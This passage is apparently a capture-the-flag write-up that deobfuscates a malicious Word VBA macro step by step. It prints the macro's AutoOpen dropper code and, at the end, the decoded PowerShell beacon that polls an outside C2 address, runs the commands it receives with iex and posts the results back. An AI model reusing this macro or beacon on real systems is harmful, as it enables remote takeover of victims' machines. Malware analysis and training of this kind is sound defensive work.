| |48 65 84 81 66 108 |036352038342038312036362031303820363520373220|
| |65 72 81 65 97 65 66|383120363520393720363520363620313138203635203|
| |118 65 71 |73120 |
|Hex String|81 65 73 65 |3831203635203733203635 |
|Hex String|66 81 |363620383120 |
|Hex String|65 69 56 65 85 119 |363520363920353620363520383520313139203636203|
| |66 85 65 67 65 65 76|835203635203637203635203635203736203831203636|
| |81 66 73 65 71 85 65|203733203635203731203835203635203839203831203|
| |89 81 66 107 65 |63620313037203635 |
|Hex String|71 85 65 99 103 66 |373120383520363520393920313033203636203132322|
| |122 65 67 65 65 81 |036352036372036352036352038312036352036362035|
| |65 66 55 |35 |
|Hex String| 65 67 73 65 81 81 |203635203637203733203635203831203831203636203|
| |66 49 65 72 81 65 |439203635203732203831203635 |
|Hex String|97 65 66 118 65 72 |393720363520363620313138203635203732203733203|
| |73 65 97 81 66 54 65|635203937203831203636203534203635203731203639|
| |71 69 65 100 65 66 |203635203130302036352036362031313220363520373|
| |112 65 71 56 65 98 |1203536203635203938 |
|Hex String| 103 |20313033 |
|Hex String|65 105 65 68 48 65 |363520313035203635203638203438203635203734203|
| |74 65 66 112 65 72 |635203636203131322036352037322034382036352037|
| |48 65 73 65 65 |3320363520363520 |
|Hex String|116 65 69 73 65 98 |313136203635203639203733203635203938203131392|
| |119 66 107 |0363620313037 |
|Hex String|65 72 |363520373220 |
|Hex String|107 65 73 65 65 111 |313037203635203733203635203635203131312036352|
| |65 70 115 65 85 119 |037302031313520363520383520313139203636203533|
| |66 53 65 72 77 65 |203635203732203737203635203130302036352036362|
| |100 65 66 108 65 71 |0313038203635203731 |
|Hex String|48 65 |3438203635 |
|Hex String| 76 103 66 85 65 71 |203736203130332036362038352036352037312038352|
| |85 65 101 65 66 48 |036352031303120363520363620343820363520363720|
| |65 67 52 65 82 81 66|353220363520383220383120363620313137203635203|
| |117 65 71 77 65 98 |731203737203635203938 |
|Hex String|119 66 107 65 71 107|313139203636203130372036352037312031303720363|
| |65 98 103 66 110 65 |520393820313033203636203131302036352037302034|
| |70 48 65 79 103 65 |382036352037392031303320363520353420363520373|
| |54 65 70 85 65 |0203835203635 |
|Hex String| 86 65 66 |203836203635203636 |
|Hex String|71 65 68 103 65 76 |373120363520363820313033203635203736203130332|
| |103 66 72 65 71 |03636203732203635203731 |
|Hex String| 85 65 100 65 66 67 |203835203635203130302036352036362036372036352|
| |65 72 107 65 100 65 |037322031303720363520313030203635203636203130|
| |66 108 65 |38203635 |
|Hex String|72 77 65 75 65 65 |373220373720363520373520363520363520313037203|
| |107 65 71 85 65 75 |635203731203835203635203735203131392036352031|
| |119 65 107 65 72 73 |303720363520373220373320363520373520383120363|
| |65 75 81 65 |5 |
|Hex String| 103 65 67 48 |20313033203635203637203438 |
|Hex String|65 97 103 66 |36352039372031303320363620 |
|Hex String|118 65 71 107 65 98 |313138203635203731203130372036352039382031303|
| |103 65 103 65 67 99 |320363520313033203635203637203939203635203733|
| |65 73 65 65 110 65 |203635203635203131302036352036372031303720363|
| |67 107 65 |5 |
|Hex String| 81 65 103 65 72 77 |203831203635203130332036352037322037372036352|
| |65 98 65 66 108 65 |039382036352036362031303820363520373120383520|
| |71 85 65 99 65 65 |363520393920363520363520313033203635203638203|
| |103 65 68 65 65 76 |63520363520373620313033 |
| |103 | |
|Hex String|65 52 65 72 48 65 83|363520353220363520373220343820363520383320363|
| |65 66 |520363620 |
|Hex String|85 65 69 73 65 101 |383520363520363920373320363520313031203131392|
| |119 65 49 65 72 85 |036352034392036352037322038352036352039392036|
| |65 99 65 65 122 65 |3520363520313232203635 |
|Hex String|72 73 65 88 119 65 |373220373320363520383820313139203635203132322|
| |122 65 68 81 65 78 8|036352036382038312036352037382038 |
|Hex String|1 66 53 65 70 56 65 |312036362035332036352037302035362036352039382|
| |98 81 65 48 65 71 77|03831203635203438203635203731203737203635 |
| |65 | |
|Hex String|99 103 65 119 65 68 |393920313033203635203131392036352036382038352|
| |85 65 102 81 |036352031303220383120 |
|Hex String|65 61 |3635203631 |
|Hex String|Scripting.FileSyst |536372697074696e672e46696c6553797374 |
|Hex String|emObject |656d4f626a656374 |
|Hex String|istory.bak |6973746f72792e62616b |
+----------+--------------------+---------------------------------------------+
VBA script deobfuscation
We are interested in the above VBA scripts. Let’s start with the shortest one:
Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
Dim nqjveawetp As Long
For nqjveawetp = 1 To Len(tiyrahvbz) Step 2
uxdufnkjlialsyp = uxdufnkjlialsyp & Chr$(Val("&H" & Mid$(tiyrahvbz, nqjveawetp, 2)))
Next nqjveawetp
End Function
It seems to be doing some kind of transformation to the variable tiyrahvbz passed as argument.
Then we have a large VBA script. I’ll break it down into smaller pieces. These are the first functions:
Sub AutoOpen()
odhsjwpphlxnb
Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
bnhupraoau = sryivxjsdncj()
dropPath = Environ("TEMP")
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
The function named AutoOpen is executed first, and it calls odhsjwpphlxnb and lmavedb. The former calls sryivxjsdncj:
Private Function sryivxjsdncj() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
sryivxjsdncj = fxnrfzsdxmcvranp
End Function
And there’s another call to okbzichkqtto, which is a huge function:
Private Function okbzichkqtto() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
okbzichkqtto = fxnrfzsdxmcvranp
End Function
Recognizing patterns
We don’t actually need to know Visual Basic for Applications (VBA), we only need to find suspicious patterns. For instance, function okbzichkqtto contains a lot of strings that are encoded in hexadecimal format. We can take one of them and decode it:
$ echo 3734203635203636203132322036352036382034382036352037342031 | xxd -r -p
74 65 66 122 65 68 48 65 74 1
Now we have numbers. Maybe they are ASCII digits, let’s have a look:
$ python3 -q
>>> ''.join(map(lambda n: chr(int(n)), '74 65 66 122 65 68 48 65 74'.split()))
'JABzAD0AJ'
It does not look very promising…
Finding the output
Notice that the above example was for a single string. In the huge function, there are a lot of strings being concatenated using + or & operator (which are equal for concatenating strings in VBA).
Actually, if we read again function uxdufnkjlialsyp, it is clear that it is decoding the input string from hexadecimal format. Then, wdysllqkgsbzs transforms the ASCII digits into characters:
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
So, we can adapt the above code in Python easily and find the output of the huge function:
$ python3 solve.py
JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=
This script can be found in here: solve.py.
Flag
Now we recognize the output as Base64-encode data, so let’s decode it and find the flag:
$ python3 solve.py | base64 -d
$s='77.74.198.52:8080';$i='d43bcc6d-043f2409-7ea23a2c';$p='http://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/d43bcc6d -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/043f2409 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/7ea23a2c -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}HTB{5up3r_345y_m4cr05}
$ python3 solve.py | base64 -d | tr -d \\0 | grep -oE 'HTB{.*?}'
HTB{5up3r_345y_m4cr05}